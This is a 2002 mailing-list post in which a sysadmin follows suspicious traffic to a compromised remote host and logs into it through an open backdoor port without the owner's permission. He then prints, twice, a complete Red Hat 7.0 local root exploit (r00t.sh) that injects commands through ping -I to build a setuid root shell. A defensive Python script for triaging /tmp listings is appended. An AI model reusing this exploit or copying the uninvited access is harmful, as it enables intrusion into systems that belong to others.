[lug] script kiddie
jdavis
lug at taproot.bz
Sat Nov 30 02:56:34 MST 2002
hello,
While reviewing last night's Snort logs I noticed a lot of SSL Slapper-like
activity from one box to my webserver. The box looked to be
in tyland, so I decided to have a look. An nmap scan of the box in tyland
showed nothing interesting except that port 2000 was open, so I telnetted
to it and got a shell with the apache uid. The shell dropped me in / so
I looked in /tmp to see if any Slapper files were there... I didn't see
any, but there was lots of other stuff.
sh-2.05$ ls -la
ls -la
total 7208
drwxr-xr-x 2 apache apache 4096 Dec 1 19:36
drwxr-xr-x 3 apache apache 4096 Nov 23 10:57
drwxrwxrwt 20 root root 4096 Dec 1 21:17 .
drwxr-xr-x 22 root root 4096 Nov 13 08:53 ..
drwxr-xr-x 3 apache apache 4096 Nov 15 12:18 ..
drwxr-xr-x 7 apache apache 4096 Dec 1 19:21 ...
drwxrwxrwt 3 root root 4096 Nov 29 09:59 .ICE-unix
-rw------- 1 apache apache 7248 Dec 1 19:41 .bash_history
srw------- 1 root nobody 0 Jun 27 23:11 .famSDVA9b
srwx------ 1 root nobody 0 Jul 9 09:10 .fam_socket
srw------- 1 root nobody 0 Jun 26 18:54 .famsJkAwq
drwxrwxrwt 2 xfs xfs 4096 Nov 13 08:53 .font-unix
drwxr-xr-x 2 apache apache 4096 Nov 18 20:33 .fontunix
-rw------- 1 apache apache 12288 Nov 29 22:32 .psybnc.pid.swp
-rw-r--r-- 1 apache apache 0 Nov 23 10:58 982235016-gtkrc-429249277
-rw-r--r-- 1 apache apache 20266 Apr 14 2001 CHANGES
-rw------- 1 apache apache 17982 Mar 26 2001 COPYING
-rw-r--r-- 1 apache apache 2660 Mar 26 2001 FAQ
-rw-r--r-- 1 apache apache 1347 Apr 15 2001 Makefile
-rw-r--r-- 1 apache apache 36672 Apr 14 2001 README
-rw-r--r-- 1 apache apache 76 Mar 24 2001 TODO
-rw------- 1 apache apache 4394 Nov 28 16:21 USER1.LOG
-rw------- 1 apache apache 1275 Nov 28 04:20 USER2.LOG
-rwxr-xr-x 1 apache apache 620708 Feb 17 2002 bash
-rw-r--r-- 1 apache apache 616831 May 29 2002 bnc.tar.gz
drwxr-xr-x 6 apache apache 4096 Dec 1 01:00 com
-rw-r--r-- 1 apache apache 958690 Nov 24 22:26 com.tgz
-rw-r--r-- 1 apache apache 958690 Nov 30 20:12 com.tgz.1
-rw------- 1 apache apache 783 Aug 6 2000 config.h
drwxr-xr-x 2 apache apache 4096 Mar 23 2001 help
drwxr-xr-x 2 apache apache 4096 Dec 1 20:53 log
-rw-r--r-- 1 apache apache 717 Feb 17 2002 makefile.out
-rwxr-xr-x 1 apache apache 6056 Feb 17 2002 makesalt
-rw-r--r-- 1 apache apache 56981 Dec 1 00:43 massopen
-rw-r--r-- 1 apache apache 1937771 Oct 21 00:40 massopen.tgz
-rw-r--r-- 1 apache apache 1937771 Oct 21 00:40 massopen.tgz.1
drwxr-xr-x 3 apache apache 4096 Jul 31 2000 menuconf
drwxr-xr-x 2 apache apache 4096 Dec 1 21:28 motd
drwx------ 2 root root 4096 Jul 9 09:13 orbit-root
-rw------- 1 apache apache 1262 Nov 28 02:55 psybnc.conf
-rw------- 1 apache apache 1262 Nov 28 02:54 psybnc.conf.old
-rw------- 1 apache apache 6 Dec 1 20:39 psybnc.pid
-rwxr-xr-x 1 apache apache 369 Aug 9 2000 psybncchk
-rwxr-xr-x 1 apache apache 2311 Nov 26 23:10 r00t.sh
drwxr-xr-x 3 apache apache 4096 Nov 27 00:04 sawfish-root
drwxr-xr-x 3 apache apache 4096 Jul 31 2000 scripts
-rw------- 1 root root 0 Nov 13 08:53 session_mm.sem
drwxr-xr-x 2 apache apache 4096 Feb 17 2002 src
-rw------- 1 apache apache 3756 Sep 15 2000 targets.mak
drwxr-xr-x 2 apache apache 4096 Feb 17 2002 tools
drwxr-xr-x 2 apache apache 4096 Nov 30 23:51 za
So psybnc is an IRC redirector and I know what a salt is, but the rest of
what's happening is news to me. Here is the r00t.sh script...
sh-2.05$ cat r0
cat r00t.sh
#!/bin/sh
echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer <krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo
PING=/bin/ping6
test -u $PING || PING=/bin/ping
if [ ! -u $PING ]; then
echo "Scuze, nu exista setuid pentru ping"
exit 0
fi
echo "Faza 1: facem lumea in care se poate scrie a / "
$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null
sleep 1
echo "Faza 2: compilam aplicatia helperului in /..."
cat >/x.c <<_eof_
main() {
setuid(0); seteuid(0);
system("chmod 755 /;rm -f /x; rm -f /x.c");
execl("/bin/bash","bash","-i",0);
}
_eof_
gcc /x.c -o /x
chmod 755 /x
echo "Faza 3: chown+chmod in aplicatia helperului nostru..."
$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1
if [ ! -u /x ]; then
echo "Aparent nu-l pot r00ta :("
exit 1
fi
echo "Hopa .. uite ca esti r00t :)"
/x
echo "Mersi"
# Nu Mai Floodati ! =-> [www.undernet.org]##!/bin/sh
echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer <krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo
echo
PING=/bin/ping6
test -u $PING || PING=/bin/ping
if [ ! -u $PING ]; then
echo "Scuze, nu exista setuid pentru ping"
exit 0
fi
echo "Faza 1: facem lumea in care se poate scrie a / "
$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null
sleep 1
echo "Faza 2: compilam aplicatia helperului in /..."
cat >/x.c <<_eof_
main() {
setuid(0); seteuid(0);
system("chmod 755 /;rm -f /x; rm -f /x.c");
execl("/bin/bash","bash","-i",0);
}
_eof_
gcc /x.c -o /x
chmod 755 /x
echo "Faza 3: chown+chmod in aplicatia helperului nostru..."
$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1
if [ ! -u /x ]; then
echo "Aparent nu-l pot r00ta :("
exit 1
fi
echo "Hopa .. uite ca esti r00t :)"
/x
echo "Mersi"
# Nu Mai Floodati ! =-> [www.undernet.org]#
I looked at 195.117.3.59 a little and got this result...
sh-2.05$ telnet 195.117.3.59 987
telnet 195.117.3.59 987
Trying 195.117.3.59...
Connected to 195.117.3.59.
Escape character is '^]'.
#KM-v0.1b+
upt: 3303336.38 2861753.33
lav: 1.41 1.33 1.17 2/315 3994
mem: 131047424 128679936 2367488 80031744 1622016 20074496
tim: 14:17:24
dat: 2002-12-01
cpu: 13925461 2968956 27263889 286175333
dsk: 24853630 13005890 1223992 0
pid: 3994
fls: 1200
ino: 3968 3064
sockets: used 281
TCP: inuse 200 highest 473
UDP: inuse 20 highest 48
RAW: inuse 1 highest 3
PAC: inuse 0 highest 1
SYN_COOKIES: count 98 since_last_check 0
Connection closed by foreign host.
Can anyone tell me what r00t.sh does? And how would one go about
notifying the owners?
jd
jd at taproot.bz
http://www.taproot.bz
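As an added example (not code from the original post or from any project it mentions), here is a small Python triage script for the kind of /tmp listing quoted above. It parses `ls -la` output and flags the indicators visible in that listing: entries whose name is blank or made only of dots so they sit next to `.` and `..`, look-alikes of legitimate system directories (`.fontunix` beside `.font-unix`), setuid/setgid files, world-writable entries without the sticky bit, and names matching known bouncer or exploit tooling. The sample listing is constructed from entries quoted in the post plus two constructed lines marked in the code; the `KNOWN_TMP_DIRS` baseline and `TOOLING_FRAGMENTS` list are assumptions for illustration.

```python
"""Triage an `ls -la` listing of a shared temp directory for compromise
indicators: names made only of dots/whitespace, look-alikes of legitimate
system directories, setuid/setgid files, world-writable entries, and names
matching known bouncer/exploit tooling.

Added example, not code from the original post. SAMPLE_LISTING is built from
entries quoted in the post plus two constructed lines (marked below);
KNOWN_TMP_DIRS and TOOLING_FRAGMENTS are assumed baselines for illustration.
"""
import re
from dataclasses import dataclass

# Fields of `ls -l`: mode, links, owner, group, size, month, day, time|year, name.
# The name group is optional so entries whose name is empty or only whitespace
# (as in the post's listing) are parsed rather than silently skipped.
LS_LINE = re.compile(
    r"^([-bcdlps][-rwxsStT]{9})\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+"
    r"([A-Z][a-z]{2})\s+(\d{1,2})\s+(\d{1,2}:\d{2}|\d{4})(?:\s(.*))?$"
)

# Assumed baseline of legitimate per-host directories found in /tmp.
KNOWN_TMP_DIRS = {".font-unix", ".ICE-unix", ".X11-unix"}
# Assumed name fragments for tooling seen in the post (psybnc, r00t.sh, bnc.tar.gz).
TOOLING_FRAGMENTS = ("psybnc", "r00t", "bnc.tar")

SAMPLE_LISTING = "\n".join([
    "total 7208",
    "drwxr-xr-x 2 apache apache 4096 Dec 1 19:36 ",          # name is a blank
    "drwxrwxrwt 20 root root 4096 Dec 1 21:17 .",
    "drwxr-xr-x 22 root root 4096 Nov 13 08:53 ..",
    "drwxr-xr-x 7 apache apache 4096 Dec 1 19:21 ...",
    "drwxrwxrwt 2 xfs xfs 4096 Nov 13 08:53 .font-unix",
    "drwxr-xr-x 2 apache apache 4096 Nov 18 20:33 .fontunix",
    "-rw------- 1 apache apache 1262 Nov 28 02:55 psybnc.conf",
    "-rwxr-xr-x 1 apache apache 2311 Nov 26 23:10 r00t.sh",
    "-rw-r--r-- 1 apache apache 36672 Apr 14 2001 README",
    "-rwsr-xr-x 1 root root 4096 Dec 1 20:39 x",             # constructed line
    "drwxrwxrwx 2 apache apache 4096 Dec 1 01:00 incoming",   # constructed line
])


@dataclass
class Entry:
    mode: str
    owner: str
    group: str
    size: int
    name: str


def parse_ls(text):
    """Parse `ls -l` output; non-entry lines such as 'total 7208' are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue
        mode, _links, owner, group, size, _mon, _day, _when, name = m.groups()
        entries.append(Entry(mode, owner, group, int(size), name or ""))
    return entries


def _normalize(name):
    """Lower-case and strip punctuation so '.fontunix' and '.font-unix' collide."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


KNOWN_NORMALIZED = {_normalize(k) for k in KNOWN_TMP_DIRS}


def classify(entry):
    """Return the list of indicator flags raised by one directory entry."""
    flags = []
    name, mode = entry.name, entry.mode
    # '.' and '..' are normal; anything else made only of dots/whitespace is hiding.
    if name not in (".", "..") and set(name) <= set(". \t"):
        flags.append("hidden-by-name")
    # A name that differs from a known system dir only by punctuation/case.
    if name not in KNOWN_TMP_DIRS and _normalize(name) in KNOWN_NORMALIZED:
        flags.append("lookalike-dir")
    # mode[3] is the owner-execute slot ('s'/'S' = setuid), mode[6] the group one.
    if mode[0] == "-" and mode[3] in "sS":
        flags.append("setuid")
    if mode[0] == "-" and mode[6] in "sS":
        flags.append("setgid")
    # World-writable, unless it is a sticky directory like /tmp itself.
    if mode[8] == "w" and not (mode[0] == "d" and mode[9] in "tT"):
        flags.append("world-writable")
    if any(frag in name.lower() for frag in TOOLING_FRAGMENTS):
        flags.append("known-tooling")
    return flags


def triage(text):
    """Return [(name, flags)] for every entry that raised at least one flag."""
    report = []
    for entry in parse_ls(text):
        flags = classify(entry)
        if flags:
            report.append((entry.name, flags))
    return report


if __name__ == "__main__":
    for name, flags in triage(SAMPLE_LISTING):
        print(f"{name!r:14} {', '.join(flags)}")
```

Run it against a saved `ls -la /tmp` capture from the suspect host instead of `SAMPLE_LISTING` to get a first pass at what needs a closer look; the flags are hints for an analyst, not a verdict.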